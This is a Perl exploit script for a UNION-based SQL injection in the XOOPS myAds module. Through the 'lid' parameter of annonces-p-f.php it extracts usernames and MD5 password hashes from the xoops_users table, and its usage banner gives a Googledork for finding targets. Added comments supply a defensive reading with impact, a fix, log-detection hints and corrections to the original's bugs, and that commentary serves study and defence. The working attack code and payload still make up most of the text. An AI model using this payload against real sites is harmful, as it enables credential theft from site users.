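#!/usr/bin/perl
use strict;
use warnings;
use IO::Socket;

######################################################
# xoops myAds module exploit for users hash viewing  #
# coded by Fear[Cyber Lords Community]               #
# http://www.cyberlords.net                          #
# Thx for help: not null                             #
# just for fun ;)                                    #
######################################################
#
# Reviewer summary (defensive reading of this proof-of-concept):
#
#   * What it demonstrates: the request built below places SQL text in the
#     `lid` query parameter of annonces-p-f.php (op=ImprAnn) in the XOOPS
#     myAds module. It only returns data if the module concatenates `lid`
#     into its SQL statement without validation, i.e. a UNION-based SQL
#     injection that reads pass/uid/uname from the xoops_users table.
#   * Impact: disclosure of one account's user name and password hash per
#     request. The regex below expects 32 lowercase hex characters, the
#     length of an MD5 digest, so any exposed hash should be treated as a
#     compromised credential and the password reset.
#   * Fix in the module: treat `lid` as an integer (cast/validate it, e.g.
#     with intval()) or bind it through a parameterized query; remove or
#     update the module if no fixed version is deployed.
#   * Detection: in web-server access logs, look for requests to
#     annonces-p-f.php whose `lid` value is not a plain integer, especially
#     ones containing "union" and "select" or a trailing "/*".
#   * The "[-]Unvulnerable" message only means the response did not match
#     the regex below; it is not evidence that an installation is patched.

# Positional arguments: target host, module folder (URL path), and the
# zero-based row offset used in the LIMIT clause.
my ($serv, $path, $userid) = @ARGV;
my $port = 80;

# The original tested `@ARGV < 2` although three arguments are interpolated
# into the request; with two arguments $userid was undefined and the query
# was malformed. Require all three before doing any network I/O.
if (@ARGV < 3) {
    print "------------------------------------------------------------\n";
    print "| Googledork: inurl:/modules/myAds/ \n";
    print "| Usage:\n";
    print "| cl_myads.pl \n";
    print "| - host for attacking \n";
    print "| - module folder \n";
    print "| - member id \n";
    print "------------------------------------------------------------\n";
    exit(0);
}

print "\n*************************\n";

# IO::Socket::INET->new returns undef on failure (reason in $@). The
# original went on to print to the undefined handle; stop here instead.
my $sock = IO::Socket::INET->new(
    Proto    => "tcp",
    PeerAddr => $serv,
    PeerPort => $port,
) or die "[-]Connection to $serv:$port failed: $@\n";
print "[+]Connecting...\r\n";

# Plain HTTP/1.0 GET. Everything after `lid=` is attacker-controlled SQL;
# this request line is exactly what appears in the victim's access log.
print $sock "GET $path/annonces-p-f.php?op=ImprAnn&lid=-1+union+select+1,pass,uid,uname,1,1,1,1,1,1,1,1,1+from+xoops_users+limit+$userid,1/* HTTP/1.0\r\n";
print $sock "Host: $serv\r\n";
print $sock "Connection: close\r\n\r\n";
print "[+]Data sent\r\n";

# "Connection: close" makes the server end the stream, so reading to EOF
# collects the whole response (headers and body) in one string.
my $response = join '', <$sock>;

# Capture 1: 32 hex characters immediately before </I>.
# Capture 2: the text of the DIV that follows (printed as the user name).
if ($response =~ m/([0-9a-f]{32})<\/I>[^;]+;">([^<]+?)<\/DIV>/s) {
    print "[+]User: " . $2 . " Password-hash: " . $1 . "\r\n";
    print "*************************\n";
}
else {
    # No match: says nothing about whether the module is actually fixed.
    print "[-]Unvulnerable";
}

close($sock);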